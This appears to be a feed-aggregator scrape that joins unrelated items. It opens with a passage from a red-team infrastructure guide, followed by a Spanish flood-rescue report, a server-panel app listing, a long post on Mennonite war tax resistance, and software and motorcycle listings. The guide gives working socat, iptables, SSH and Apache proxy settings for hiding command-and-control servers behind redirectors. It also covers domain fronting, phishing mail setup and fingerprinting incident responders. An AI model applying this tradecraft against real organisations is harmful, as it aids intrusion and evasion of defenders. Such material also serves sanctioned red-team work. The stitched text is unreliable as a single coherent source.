Postfix provides an easier alternative to sendmail with wider compatiblity. Postfix also offers full IMAP support with Dovecot. This allows testers to correspond in real-time with phishing targets who respond to the original message, rather than relying on the catch-all address and having to create a new message using your phishing tool.

A full guide to setting up a Postfix mail server for phishing is available in Julian Catrambone's (@n0pe_sled) post Mail Servers Made Easy.

DNS

Sample DNS Redirector Setup

Note: When using C2 redirectors, a foreign listener should be configured on your post-exploitation framework to send staging traffic through the redirector domain. This will cause the compromised host to stage through the redirector like the C2 traffic itself.

socat for DNS

socat can be used to redirect incoming DNS packets on port 53 to our team server. While this method works, some user’s have reported staging issues with Cobalt Strike and or latency issues using this method. Edit 4/21/2017: The following socat command seems to work well thanks to testing from @xorrior:

socat udp4-recvfrom:53,reuseaddr,fork udp4-sendto:<IPADDRESS>; echo -ne

Redirecting Cobalt Strike DNS Beacons - Steve Borosh

iptables for DNS

iptables DNS forwarding rules have been found to work well with Cobalt Strike. There does not seem to be any of the issues that socat has handling this type of traffic.

An example DNS redirector rule-set is below.

iptables -I INPUT -p udp -m udp --dport 53 -j ACCEPT
iptables -t nat -A PREROUTING -p udp --dport 53 -j DNAT --to-destination <IP-GOES-HERE>:53
iptables -t nat -A POSTROUTING -j MASQUERADE
iptables -I FORWARD -j ACCEPT
iptables -P FORWARD ACCEPT
sysctl net.ipv4.ip_forward=1

Also, change "FORWARD" chain policy to "ACCEPT"

DNS redirection can also be done behind NAT

Some may have the requirement or need to host a c2 server on an internal network. Using a combination of IPTABLES, SOCAT, and reverse ssh tunnels, we can certainly achieve this in the following manner.

Sample DNS NAT Setup

In this scenario we have our volitile redirector using IPTables to forward all DNS traffic using the rule example described earlier in this section. Next, we create an SSH reverse port forward tunnel from our internal c2 server, to our main redirector. This will forward any traffic the main redirector receives on port 6667 to the internal c2 server on port 6667. Now, start socat on our team server to fork any of the incoming TCP traffic on port 6667 to UDP port 53 which, is what our DNS c2 needs to listen on. Finally, we similarly setup a socat instance on the main redirector to redirect any incoming UDP port 53 traffic into our SSH tunnel on port 6667.

HTTP(S)

Note: When using C2 redirectors, a foreign listener should be configured on your post-exploitation framework to send staging traffic through the redirector domain. This will cause the compromised host to stage through the redirector like the C2 traffic itself.

socat vs mod_rewrite

socat provides a ‘dumb pipe’ redirection. Any request socat receives on the specified source interface/port is redirected to the destination IP/port. There is no filtering or conditional redirecting. Apache mod_rewrite, on the other hand, provides a number of methods to strengthen your phishing and increase the resilience of your testing infrastructure. mod_rewrite has the ability to perform conditional redirection based on request attributes, such as URI, user agent, query string, operating system, and IP. Apache mod_rewrite uses htaccess files to configure rulesets for how Apache should handle each incoming request. Using these rules, you could, for instance, redirect requests to your server with the default wget user agent to a legitimate page on your target's website.

In short, if your redirector needs to perform conditional redirection or advanced filtering, use Apache mod_rewrite. Otherwise, socat redirection with optional iptables filtering will suffice.

socat for HTTP

socat can be used to redirect any incoming TCP packets on a specified port to our team server.

The basic syntax to redirect TCP port 80 on localhost to port 80 on another host is:

socat TCP4-LISTEN:80,fork TCP4:<REMOTE-HOST-IP-ADDRESS>:80

If your redirector is configured with more than one network interface, socat can be bound to a specific interface, by IP address, with the following syntax:

socat TCP4-LISTEN:80,bind=10.0.0.2,fork TCP4:1.2.3.4:80

In this example, 10.0.0.2 is one of the redirector's local IP addresses and 1.2.3.4 is the remote team server's IP address.

iptables for HTTP

In addition to socat, iptables can perform 'dumb pipe' redirection via NAT. To forward the redirector's local port 80 to a remote host, use the following syntax:

iptables -I INPUT -p tcp -m tcp --dport 80 -j ACCEPT
iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to-destination <REMOTE-HOST-IP-ADDRESS>:80
iptables -t nat -A POSTROUTING -j MASQUERADE
iptables -I FORWARD -j ACCEPT
iptables -P FORWARD ACCEPT
sysctl net.ipv4.ip_forward=1

SSH for HTTP

We have previously covered using SSH for DNS tunnels. SSH works as a solid, and robust means to break through NAT and obtain a way for the implant to connect to a redirector and into your server environment. Before setting up an SSH redirector, you must add the following lines to /etc/ssh/sshd_config:

# Allow the SSH client to specify which hosts may connect
GatewayPorts yes

# Allow both local and remote port forwards
AllowTcpForwarding yes

To forward the redirector's local port 80 to your internal teamsrver, use the following syntax on the internal server:

tmux new -S redir80
ssh <redirector> -R *:80:localhost:80
Ctrl+B, D

You can also forward more than one port, for example if you want 443 and 80 to be open all at once:

tmux new -S redir80443
ssh <redirector> -R *:80:localhost:80 -R *:443:localhost:443
Ctrl+B, D

Payloads and Web Redirection

When serving payload and web resources, we want to minimize the ability for incident responders to review files and increase the chances of successfully executing the payload, whether to establish C2 or gather intelligence.

Sample Apache Redirector Setup

Apache Mod_Rewrite usage and examples by Jeff Dimmock:

Other Apache mod_rewrite usage and examples:

To automatically set up Apache Mod_Rewrite on a redirector server, check out Julain Catrambone's (@n0pe_sled) blog post Mod_Rewrite Automatic Setup and the accompanying tool.

C2 Redirection

The intention behind redirecting C2 traffic is twofold: obscure the backend team server and appear to be a legitimate website if browsed to by an incident responder. Through the use of Apache mod_rewrite and customized C2 profiles or other proxying (such as with Flask), we can reliably filter the real C2 traffic from investigative traffic.

C2 Redirection with HTTPS

Building on "C2 Redirection" above, another method is to have your redirecting server use Apache's SSL Proxy Engine to accept inbound SSL requests, and proxy those to requests to a reverse-HTTPS listener. Encryption is used at all stages, and you can rotate SSL certificates on your redirector as needed.

To make this work with your mod_rewrite rules, you need to place your rules in "/etc/apache2/sites-available/000-default-le-ssl.conf" assuming you've used LetsEncrypt (aka CertBot) to install your certificate. Also, to enable the SSL ProxyPass engine, you'll need the following lines in that same config file:

# Enable the Proxy Engine
SSLProxyEngine On

# Tell the Proxy Engine where to forward your requests
ProxyPass / https://DESTINATION_C2_URL:443/
ProxyPassReverse / https://DESTINATION_C2_URL:443/

# Disable Cert checking, useful if you're using a self-signed cert
SSLProxyCheckPeerCN off
SSLProxyCheckPeerName off
SSLProxyCheckPeerExpire off

Other Apache mod_rewrite Resources

Cobalt Strike

Cobalt Strike modifies its traffic with Malleable C2 profiles. Profiles provide highly-customizable options for modifying how your server’s C2 traffic will look on the wire. Malleable C2 profiles can be used to strengthen incident response evasion, impersonate known adversaries, or masquerade as legitimate internal applications used by the target.

As you begin creating or modifying Malleable C2 profiles, it's important to keep data size limits for the Beacon info placement. For example, configuring the profile to send large amounts of data in a URL parameter will require many requests. For more information about this, check out Raphael Mudge's blog post Beware of Slow Downloads.

If you encounter issues with your Malleable C2 profile and notice the teamserver console outputting errors, refer to Raphael Mudge's blog post Broken Promises and Malleable C2 Profiles for troubleshooting tips.

Empire

Empire uses Communication Profiles, which provide customization options for the GET request URIs, user agent, and headers. The profile consists of each element, separated by the pipe character, and set with the set DefaultProfile option in the listeners context menu.

Here is a sample default profile:

"/CWoNaJLBo/VTNeWw11212/|Mozilla/4.0 (compatible; MSIE 6.0;Windows NT 5.1)|Accept:image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*|Accept-Language:en-en"

Alternatively, the DefaultProfile value can be set by modifying the file /setup/setup_database.py before Empire’s initial setup. This will change the default Communication Profile that Empire will use.

In addition to the Communication Profile, consider customizing the Empire server's staging URIs, server headers, and defaut webpage content by following the steps presented in Joe Vest's (@joevest) post Empire - Modifying Server C2 Indicators.

Leveraging trusted, legitimate web services for C2 can provide a valuable leg-up over using domains and infrastructure you've configured yourself. Configuration time and complexity varies based on the technique and service being used. A popular example of leveraging third-party services for C2 redirection is Domain Fronting.

Domain Fronting

Domain Fronting is a technique used by censorship evasion services and apps to route traffic through legitimate and highly-trusted domains. Popular services that support Domain Fronting include Google App Engine, Amazon CloudFront, and Microsoft Azure. It's important to note that many providers, like Google and Amazon have implemented mitigations against Domain Fronting, so some linked resources or information provided in this wiki may be outdated by the time you try to use it.

In a nutshell, traffic uses the DNS and SNI name of the trusted service provider, Google is used in the example below. When the traffic is received by the Edge Server (ex: located at gmail.com), the packet is forwarded to the Origin Server (ex: phish.appspot.com) specified in the packet’s Host header. Depending on the service provider, the Origin Server will either directly forward traffic to a specified domain, which we’ll point to our team server, or a proxy app will be required to perform the final hop forwarding.

Domain Fronting Overview

For more detailed information about how Domain Fronting works, see the whitepaper Blocking-resistant communication through domain fronting and the TOR Project’s meek documentation

In addition to the standard frontable domains, such as any google.com domain, it's possible to leverage other legitimate domains for fronting.

For more information about hunting frontable domains, check out:

Further Resources on Domain Fronting

PaaS Redirectors

Many PaaS and SaaS providers provide a static subdomain or URL for use with a provisioned instance. If the associated domain is generally highly trusted, the instances could provide extra trust to your C2 infrastructure over a purchased domain and VPS.

To set the redirection up, you will need to identify a service that issues a static subdomain or URL as part of an instance. Then, either the instance will need to be configured with network or application-based redirection. The instance will act as a proxy, similar to the other redirectors discussed on this wiki.

Specific implementation can vary greatly based on the service; however, for an example using Heroku, check out the blog post Expand Your Horizon Red Team – Modern SaaS C2 by Alex Rymdeko-Harvey (@Killswitch_GUI).

Another interesting technique that merits further research is the use of overly-permissive Amazon S3 buckets for C2. Check out the post S3 Buckets for Good and Evil by Andrew Luke (@Sw4mp_f0x) for more details on how S3 buckets could be used for C2. This technique could be combined with the third-party C2 capabilities of Empire to use the target's legitimate S3 buckets against them.

For another example of using PaaS for C2, check out Databases and Clouds: SQL Server as a C2 by Scott Sutherland (@_nullbind).

Other Third-Party C2

Other third-party services have been used in the wild for C2 in the past. Leveraging third-party websites that allow for the rapid posting or modification of user-generated content can help you evade reputation-based controls, especially if the third-party site is generally trusted.

Check out these resources for other third-party C2 options:

Attack infrastructure is often easy to identify, appearing like a shell of a legitimate server. We will need to take additional steps with our infrastructure to increase the likelihood of blending in with real servers amongst either the target organization or services the target may conceivably use.

Redirectors can help blend in by redirecting invalid URIs, expiring phishing payload links, or blocking common incident responder techniques; however, attention should also be paid to the underlying host and its indicators.

For example, in the post Fall of an Empire, John Menerick (@Lord_SQL) covers methods to detect Empire servers on the internet.

To combat these and similar indicators, it's a good idea to modify C2 traffic patterns, modify server landing pages, restrict open ports, and modify default response headers.

For more details about how to do these and other tactics for multiple attack frameworks, check out these posts:

Attack infrastructure can be attacked just the same as any other internet-connected host, and it should be considered HIGHLY sensitive due to the data in use and connections into target environments.

In 2016, remote code execution vulnerabilities were disclosed on the most common attack tools:

iptables should be used to filter unwanted traffic and restrict traffic between required infrastructure elements. For example, if a Cobalt Strike team server will only serve assets to an Apache redirector, iptables rules should only allow port 80 from the redirector’s source IP. This is especially important for any management interfaces, such as SSH or Cobalt Strike’s default port 50050. Also consider blocking non-target country IPs. As an alternative, consider using hypervisor firewalls provided by your VPS providers. For example, Digital Ocean offers Cloud Firewalls that can protect one or multiple droplets.

chattr can be used on team servers to prevent cron directories from being modified. Using chattr, you can restrict any user, including root, from modifying a file until the chattr attribute is removed.

SSH should be limited to public-key authentication only and configured to use limited-rights users for initial login. For added security, consider adding multi-factor authentication to SSH.

Update! No securing list is complete without a reminder to regularly update systems and apply hot-fixes as needed to remediate vulnerabilities.

Of course, this list is not exhaustive of what you can do to secure a team server. Follow common hardening practices on all infrastructure:

Specific Hardening Resources

There are a number of resources available online discussing the secure setup and design of infrastructures. Not every design consideration will be appropriate for every attack infrastructure, but it's useful to know what options are available and what other testers are doing.

Here are some of those resoources:

The topics covered in this wiki strengthen attack infrastrctures, but generally require a good deal of time to design and implement. Automation can be used to greatly reduce deployment times, allowing you to deploy more complex setups in less time.

Check out these resources about attack infrastructure automation:

  • Document everything - Running a complex Red Team infrastructure means many moving parts. Be sure to document each asset’s function and where its traffic is sent.

  • Split assets among different service providers and regions - Infrastructure assets should be spread across multiple service providers and geographic regions. Blue Team members may raise monitoring thresholds against providers identified as actively performing an attack and may even outright block a given service provider. Note: keep international privacy laws in mind if sending encrypted or sensitive data across borders.

  • Don't go overboard - It's easy to get excited about advanced techniques and want to throw the kitchen sink at a target. If you are emulating a specific adversarial threat, only leverage techniques the real threat actor used or techniques within the skillset of the threat actor. If your red team testing will attack the same target long-term, consider starting "easy" and working through the more advanced tradecraft as your assessments go on. Evolving the red team's technique alongside the blue team's will consistenly push the organization forward, whereas hitting the blue team with everything at once may overwhelm the blue team and slow the learning process.

  • Monitor logs - All logs should be monitored throughout the engagement: SMTP logs, Apache logs, tcpdump on socat redirectors, iptables logs (specific to traffic forwarding or targeted filtering), weblogs, Cobalt Strike/Empire/MSF logs. Forward logs to a central location, such as with rsyslog, for easier monitoring. Operator terminal data retention may come in handy for going over an historical command useage during an operation. @Killswitch_GUI created an easy-to-use program named lTerm that will log all bash terminal commands to a central location. Log all terminal output with lTerm. Check out Vincent Yiu's post CobaltSplunk for an example of how to send Cobalt Strike logs to Splunk for advanced infrastructure monitoring and analysis.

  • Implement high-value event alerting - Configure the attack infrastructure to generate alerts for high-value events, such as new C2 sessions or credential capture hits. One popular way of implementing alerting is via a chat platform's API, such as Slack. Check out the following posts about Slack alerting: Slack Shell Bot - Russel Van Tuyl (@Ne0nd0g), Slack Notifications for Cobalt Strike - Andrew Chiles (@AndrewChiles), Slack Bots for Trolls and Work - Jeff Dimmock (@bluscreenfojeff)

  • Fingerprint incident response - If possible, try to passively or actively fingerprint IR actions before the assessment starts. For example, send a mediocre phishing email to the target (using unrelated infrastructure) and monitor traffic that infrastructure receives. IR team investigations can disclose a good deal of information about how the team operates and what infrastructure they use. If this can be determined ahead of the assessment, it can be filtered or redirected outright.

A BIG THANK YOU to all the following people (listed alphabetically) who contributed tools, tips, or links to include in the wiki, and another THANK YOU to anyone who wrote a tool or post referenced in this wiki!


          Rescatan a tres de arroyo al poniente de Hermosillo      Cache   Translate Page   Web Page Cache   
Tres personas fueron rescatadas del interior de un arroyo ubicado al Poniente de la ciudad, pero ningún caso de gravedad, es hasta lo que al momento se ha registrado en la Unidad Municipal de Protección Civil de Hermosillo (UMPC).

Se detalló que las personas se encontraban en el Arroyo San Patricio, localizado en Carlos Quintero Arce y Rafael Sesma Verdugo, donde fueron rescatadas tres personas.

Las precipitaciones iniciaron a las 19:11 horas de hoy, las cuales ingresaron por la zona Oriente de la ciudad, registrando la mayor cantidad de agua acumulado en el área denominada La Finca, en San Pedro, El Saucito, con 35.31 milímetros, con vientos de hasta 45 kilómetros por hora.

En el ejido La Victoria, a la altura del CIAD, se registró una precipitación de 28.19 milímetros, con vientos máximos de 29 kilómetros por hora; en el Norte de Hermosillo hubo precipitaciones de 8.38 milímetros, en el Sur 20.57, en el lado Poniente 13.21 y en el Centro 25.65 milímetros.

En el informe se agregó que hubo un reporte de viviendas inundadas en la calle Apache Norte y Chiricahua, de la colonia El Apache, pero no fue situación de gravedad. El Departamento de Bomberos informó que también se reportaron inundaciones en la colonia Las Minitas, pero no fue efectivo.
          goPanel 2.0.3 - Manage Web servers. (Shareware)      Cache   Translate Page   Web Page Cache   

goPanel is an incredibly intuitive OS X app for the management of web servers, an alternative to existing control-panel apps you install on Unix-based servers for web hosting. Easy-to-install and configure Apache or Nginx webserver, PHP, MySQL, FTP, domains, free SSL certs and emails on your server. goPanel lets you easily connect and manage unlimited Linux servers.

Features
  • Add and manage unlimited servers (VPS or dedicated)
  • Install, configure and manage: Apache or Nginx, PHP, FTP (Pure-FTPd), MySQL or MariaDB, Mail Server to get each of your servers ready to host domains
  • PHP and Apache on/off from selection of modules
  • Unlimited MySQL/MariaDB users and databases, domains, ftp accounts and emails
  • Unlimited free SSL** certs issued by Let’s Encrypt certificate authority
  • Fail2Ban intrusion prevention software Install and Configure
  • Setup scheduled cron jobs
  • Setup backup for your files or databases
  • View server logs and block IP's
  • Rollback up to 50 earlier versions of your config files in case you need to
  • System updates - keep your linux server up to date
  • 3rd-party scripts:
    • WP-CLI + One-click Wordpress installer
    • Composer (application-level package manager)
    • PHPMyAdmin(database manager)
    • Webmailer (roundcube)

goPanel works perfect with Amazon instances and Digital Ocean droplets as long as you use a Linux distribution we support. Make sure your Linux server does not have any of the services installed and you install all services from the goPanel app: migration from servers with existing services is not yet possible.



Version 2.0.3:
  • Support for Raspbian
  • Support for CentOS 6.10
  • Small fixes


  • OS X 10.10 or later



More information

Download Now
          Tax Resistance in “The Mennonite”, 1990 · TPL      Cache   Translate Page   Web Page Cache   

This is the thirty-sixth in a series of posts about war tax resistance as it was reported in back issues of The Mennonite. Today we enter the 1990s.

The Mennonite

The issue introduced The Mennonite readers to the tax resistance campaign organized by Palestinian Christians in Beit Sahour in response to the Israeli occupation. Excerpts:

In residents began refusing to pay taxes to the Israeli occupiers. Tax money should go for roads, health and local services, they said. But the occupiers were supplying none of these services. Instead they used taxes to fund the military occupation. Residents adopted the slogan “No taxation without representation.”

The authorities responded with nightly curfews, mass arrests and a strong troop presence in the town. But residents still did not pay their taxes. For six weeks in , Israeli troops sealed off the town. They seized property and belongings from businessmen and families who had not paid taxes. Tax officials went from house to house humiliating and beating people, according to a account in the Jerusalem Post.

Israeli tax officials confiscated without trial several million dollars worth of property. The tax siege has now been lifted, but Beit Sahour residents still refuse to pay taxes.

A set of articles on war tax resistance appeared in the edition. The first, by Linda Peachey, explained why she took the issue seriously:

I recently attended a meeting that focused on the question of paying the military portion (about 50 percent) of our [U.S.] federal income taxes. I left the meeting troubled, not because there were varying viewpoints but because many people appeared unconcerned about the issue and failed to address what I believe are key questions on the matter.

The question for me is not whether we should honor our government or whether a government has the right to collect taxes. The crux of the matter is to determine when Caesar’s demands conflict with our obedience to God. I fear that if I were to give Caesar all that he demands in war taxes, I would fail to honor God in four important ways.

  1. I fear that by paying the military portion of my income taxes I fail to trust God alone for my security. Throughout history nations have tried to secure their well-being and safety through military solutions. Again and again in the Bible God asks us to resist such solutions and to trust him instead:

    War horses are useless for victory; their great strength cannot save. The Lord watches over those who have reverence for him, those who trust in his constant love. He saves them from death… We put our hope in the Lord; he is our protector and our help (Psalm 33:17-20).

    If I work several months each year to pay my nation’s military dues, am I not giving legitimacy to the military establishment’s answers for my security? If I am willing to invest so much of my time and energy in a military solution, can I honestly say that God is my protector?

  2. I fear that by paying my war taxes I fail to give my primary loyalty to Christ’s worldwide church. My war taxes would purchase planes, bombs, guns and military training to be used in Third World settings. Although our country is not involved in any declared war, our military might is felt keenly in Central America, the Philippines and the Middle East.

    In fact, in recent years the United States has adopted a policy of promoting “low-intensity conflict” in countries that threaten to move out from under our sphere of influence. This means keeping warfare away from the American public eye and avoiding the involvement of American soldiers in the fighting. Yet our brothers and sisters in Christ do die in the struggle. Can I say that my first loyalty is to the worldwide kingdom of God if I comply with structures that do violence to my neighbors around the world?

  3. I fear that by paying my war taxes I fail to follow Christ as he calls me to love all people, even my enemies. In Matthew 5 Jesus no doubt surprised his listeners by challenging them to love not only their friends but all people, just as God does. This has not been an easy teaching for the church. Peter struggled with it when he was called to go to Cornelius, a gentile, and Paul reminded the early church often that the gospel was not only for Jews but also for gentiles.

    Ephesians 2:14 points this out: “For Christ himself has brought us peace by making Jews and gentiles one people. With his own body he broke down the wall that separated them and kept them enemies.” Do we believe that this can also apply to Americans and Soviets, rich and poor, capitalist and communist? Can I believe this and at the same time contribute to the forces that are designed to destroy these very people whom Christ called me to love?

  4. I fear that by paying my war taxes I fail to respect God’s creation. In today’s world, militarism not only threatens people but all of creation as well. While militarism is not the only way we dishonor God’s creation, it is through nuclear weapons that we dare to threaten all that God has made. Can I claim to truly honor God if I continue to help pay for such weapons?

I think these questions have special poignancy for us as Mennonites. We claim to be conscientious objectors to war. Yet in a low-intensity conflict or in a nuclear war it is almost irrelevant to say that we will not serve in the military. These kinds of wars do not demand our bodies but our dollars and our consent. Thus we cannot ignore this issue of war taxes.

I recognize that sincere people differ on this issue. Some encourage elected leaders to reorder our nation’s priorities. Some give away more of their income so that they owe less income tax. Some live in community so that they can live on lower incomes. Some withhold a symbolic amount of all of their military taxes. Some support legislative efforts that would allow conscientious objectors to designate the military portion of their federal taxes to a peace tax fund. What is important is not so much that we all agree but that we agonize together on these questions.

Let us pray for wisdom as we wrestle with what this issue means for our faith in God, our witness as a Christian church, our faithfulness to Christ and our reverence for God’s creation.

This was accompanied by a sidebar invitation for people to redirect their taxes through “the Taxes for Peace fund.” It added that “In , $5750 in Taxes for Peace funds were divided between the National Campaign for a Peace Tax Fund and Christian Peacemaker Teams; 1990 contributions will be divided the same way.”

Turn the page to find this news:

Members of St. Louis Mennonite Fellowship recently passed a proposal to faithfully resist payments of the U.S. federal phone tax applied monthly to the fellowship’s phone bill. The revenues will be redirected to Mennonite Central Committee. “We wish to respect the convictions of our members and Anabaptist forebears and to be disciplined followers of Jesus Christ,” said Scott Neufeld, coordinator of St. Louis Mennonite Peace Witness. Federal phone tax revenues, first collected in , contribute directly to the U.S. Armed Forces and other systems of war, Neufeld said.

The edition included Craig Morton’s article: “Render taxes to whom?” Excerpts:

Looking at our Anabaptist heritage and looking at our Scriptures in light of contemporary political realities, we do not have to be pressed to pray for peace while paying for war. Our spiritual authority in Jesus Christ, as expressed by apostles and Anabaptist forebears, allows and empowers us to make the difficult decision to withhold war taxes. Balthasar Hubmaier, writing about taxes paid to an unjust government, states, “…to come to the point, God will excuse us for nothing on the account of unjust superiors…” (Anabaptism in Outline, Klassen, p. 246). The U.S. government has become unjust, and when a government is unjust, it has forfeited the right to expect my taxes.

As Christians and Anabaptists, we have a rich tradition of conscience. In some ways we even have a tradition of anarchy. Anarchy in the eyes of the world, that is, for we may claim a greater authority — God.…

The early Anabaptists — Menno Simons, Balthasar Hubmaier, Jacob Hutter and Peter Rideman — all spoke out on the proper attitude of a Christian toward government, on paying taxes used for war and on the production of weapons of violence. For Anabaptist Christians the issue to pay or not to pay war taxes has a significant history.

Jacob Hutter wrote, “For how can we be innocent before our God if we do not go to war ourselves but give the money that others may go in our place? We will not become partakers of the sin of others and dishonor and despise God” (“Plots and Excuses,” Klassen p. 252). While this may refer to the practice of paying one’s way out of military service by supplying a replacement, it still holds true that aiding the carrying out of violence indirectly indicts the taxpayer as a participant in the violence enacted. Similarly Peter Rideman asserts that one has a responsibility not only for what one produces but also for how those products are used by others. Rideman states that Christians cannot build weapons of violence, even if they do not use those products themselves. The one who produces weapons is responsible for the violence inflicted.

But the issue of our history as Christians and as Anabaptists concerning the issue of war tax resistance is made more difficult because of our reading of the biblical texts relating to government, particularly Matthew 22:21 (and other texts referring to government, e.g. Romans 13 and 1 Peter 2:14). In any discussion of war tax resistance among Christians, the words of Jesus are almost always quoted, “…render to Caesar the things that are Caesar’s and to God the things that are God’s.” However, if we look closely at the political and historical context of these biblical texts, we have to ask ourselves how we can apply Jesus’ response in Matthew 22:21 to ourselves in our political and historical situation.

Trick question: Ancient Palestine, in the time of Jesus, was a territory held captive under Roman rule. Foreign powers hostile to Judaism had occupied Palestine, installed a puppet ruler, King Herod, and sought to form alliances with certain Jewish factions. The Pharisees, on the other hand, reflected the thoughts and feelings of the majority of the poor and middle-class Jews, feelings of resentment and anger. The Pharisees, who had been plotting to do away with Jesus on any grounds possible, were seeking to trick Jesus. On the chance that Jesus might make some incriminating statements, the Pharisees sent their disciples to Jesus along with representatives from Herod. That way, if Jesus said something self-incriminating to the religious people or to the political regime, he could be arrested. As it was, neither truth nor justice were being sought by this group when they asked Jesus the question about paying the tax. It was a trick question, and Jesus responded with a trick answer. “And Jesus said to them, ‘Render to Caesar the things that are Caesar’s and to God the things that are God’s.’ And they were greatly amazed at him” (Mark 12:17).

But what does his answer say to us? What direction does it give to those who are not asking trick questions but whose motives are truth and justice? We must take seriously that we do not live in a political situation anything like ancient Palestine. We live in , has witnessed amazing revolutions of democratization. Democracies seek to do away with the dichotomy between the government and the people. In a democracy there is no Caesar. Since we are not ruled by a monarch, we have no “caesar” over us. If there is a caesar over us, so to speak, then we are caesar.

The U.S. Constitution begins by naming our caesar, “We the people.”…

We, as responsible citizens, are the political and moral authority of the United States. If our nation blunders and falls, if it is unjust and violent, if it has misplaced priorities, then the blame is on us and not merely upon those we have elected to represent our concerns.

Living in a democracy, we actually pay taxes to ourselves. We are responsible for setting the budgets. We are responsible for policies. One of our greatest problems is that we have surrendered democratic government to bureaucracy, allowing others to make decisions for us. We are the caesar to whom we are to render our taxes, not some authority outside ourselves. As such, it is up to us to decide what we will or will not render. It is this freedom of conscience that makes democracy both attractive to those who live without it and a headache to those who must operate with it. For this reason, Plato said, democracy is the best form of a bad government and the worst form of a good one.

A restraint of evil: Those of us who withhold a portion of our taxes are trying to reorient our national spending priorities by saying we will not pay for war or violence. The portion we do not pay we give away to those who will use it for peace. While we recognize that we are breaking a law of the people (willing to take responsibility and to be accountable for our actions), we are not breaking a law against caesar. What we are trying to do is give ourselves what we need to function as a government, that is, to function as a restraint of evil and to be a supporter of good (1 Peter 2:14).

Menno Simons wrote that the task of government is to “do justice… to deliver the oppressed,… without tyranny… without force, violence and blood” (“Foundation of Christian Doctrine,” Complete Writings of Menno Simons, p. 193). Government ceases to be legitimate when it ceases to be a force for order in both foreign and domestic realms, when it ceases to provide for the needs of all, and when it ceases to be a body of law for carrying out justice without violence and bloodshed.

Would we continue to give our tithes and offerings to a ministry that has been proven to be unethical, caught in scandalous dealings and clearly immoral? If we held our government up to the same standards as we do televangelists and their ministries, the government would not be able to finance its bureaucracies. Our government has been caught in one scandal after another, involved in or supporting one war after another. And because we are caesar, we are responsible for this scandalous behavior. Even though we have given away our democratic rights to bureaucratic powers, we still will bear God’s judgment. The majority of our federal budget pays for the operations of the world’s largest military system, which prepares for war with scarce resources. It finances low-intensity conflicts throughout the world by supplying and sponsoring surrogate armies. It has yet to finish paying for past wars. Thus we must come to terms with the reality that we are producing and indirectly using weapons of violence. Living in a democracy, we are, as citizens, weapons producers by providing through our taxes the capital needed for the production of B1-Bs, MX “Peacekeepers,” Apache attack helicopters, bullets, rifles and on and on.

The Scriptures, which determine the right function of government, the witness of our Anabaptist forebears and our democratic freedoms force us to act in ways that affect the political process. For many, tax resistance is a way to bring about a change in federal spending priorities. But much more importantly, it is a way to make one’s life have integrity and to align one’s life with God’s gospel of shalom.

The edition announced a “Standing Up for Peace Contest” with $1,100 in prizes available to “young people ages 15–23” who “interview someone who has refused to fight in war, pay taxes for war, or build weapons for war and share the story through writing an essay or song, producing a video, or creating a work of art.”

The edition brought these news briefs:

The Mennonite Church General Board, after years of study and discussion, brought the military tax question to a vote, then tabled it. a majority of General Assembly delegates voted to “support” the efforts of church board employees who do not wish their taxes deducted so that they may deal with the government in regard to military taxes. At the General Board meetings in Kalona, Iowa, members tabled a motion to honor requests of employees who ask that their income tax not be withheld.

Gary Jewell, a student at Associated Mennonite Biblical Seminaries, Elkhart, Ind., handed out about $150 in $1 bills to passers-by in front of the downtown post office in Elkhart to express his opposition to U.S. military spending. He gave away about half of what he and his wife, Jan Yoder, owe in federal income taxes. The couple plans to give the rest to a charity like Mennonite Central Committee. Stapled to each $1 bill was a statement by Jewell that read in part, “Today I choose to give my money away (call it a ‘peace dividend’) rather than to pay the remaining 60 percent of my federal income tax that goes toward present and past military expense.” (The Elkhart Truth)

The edition included a sidebar with this quote:

“Until membership in the church means that a Christian chooses not to engage in violence for any reason and instead chooses to love, pray for, help and forgive all enemies; until membership in the church means that Christians may not be members of any military…; until membership in the church means that Christians cannot pay taxes for others to kill others; and until the church says these things in a fashion that the simplest soul can understand — until that time humanity can only look forward to more dark nights of slaughter on a scale unknown in history. Unless the church unswervingly and unambiguously teaches what Jesus teaches on this matter, it will not be the divine leaven in the human dough that it was meant to be.” ―George Zabelka, who served as a Roman Catholic chaplain for those who dropped the atomic bombs on Hiroshima and Nagasaki on and

The General Boards of the General Conference Mennonite Church and the Mennonite Church issued their first joint statement as a merging body in . It urged the U.S. to stand down from its Iraq war threats.

One of the seven points of the document calls congregations to confess “our own complicity and selfishness in utilizing more than our share of the world's supply of oil and other resources… limited concern for longstanding injustices in the Middle East and… paying for the military buildup through our taxes.”

The edition updated readers about the Jerilynn Prior war tax resistance case in Canada. (She was denied an appeal to the Supreme Court.)

A regional report from the noted that in the Mennonite Conference of Eastern Canada, “A conference employee has requested that the conference not withhold his war taxes. This issue will be brought to a future conference session.”


          XAMPP 5.6.37-0      Cache   Translate Page   Web Page Cache   
An easy to install Apache distribution for Windows containing MySQL, PHP & Perl
          simple mysql database clone      Cache   Translate Page   Web Page Cache   
I need really simple mysql database creator in debian. I have the structure file so it should be done real quick please message me. (Budget: $10 - $30 USD, Jobs: Apache, Linux, MySQL, PHP, Software Architecture)
          XAMPP 5.6.37-0      Cache   Translate Page   Web Page Cache   
An easy to install Apache distribution for Windows containing MySQL, PHP & Perl
          XAMPP 5.6.37-0      Cache   Translate Page   Web Page Cache   
An easy to install Apache distribution for Windows containing MySQL, PHP & Perl
          XAMPP 5.6.37-0      Cache   Translate Page   Web Page Cache   
An easy to install Apache distribution for Windows containing MySQL, PHP & Perl
           2010 TVS Apache RTR 45000 Kms       Cache   Translate Page   Web Page Cache   
Price: ₹ 24,000, Model: Apache RTR, Year: 2010 , KM Driven: 45,000 km,
2010 TVS Apache RTR 45000 Kms https://www.olx.in/item/2010-tvs-apache-rtr-45000-kms-ID1mANwX.html
           2006 TVS Apache RTR 30000 Kms       Cache   Translate Page   Web Page Cache   
Price: ₹ 20,000, Model: Apache RTR, Year: 2006 , KM Driven: 30,000 km,
2006 TVS Apache RTR 30000 Kms https://www.olx.in/item/2006-tvs-apache-rtr-30000-kms-ID1mAwQD.html
          XAMPP 5.6.37-0      Cache   Translate Page   Web Page Cache   
An easy to install Apache distribution for Windows containing MySQL, PHP & Perl
          Προγραμματιστής Unity / Android - Θεσσαλονίκη      Cache   Translate Page   Web Page Cache   
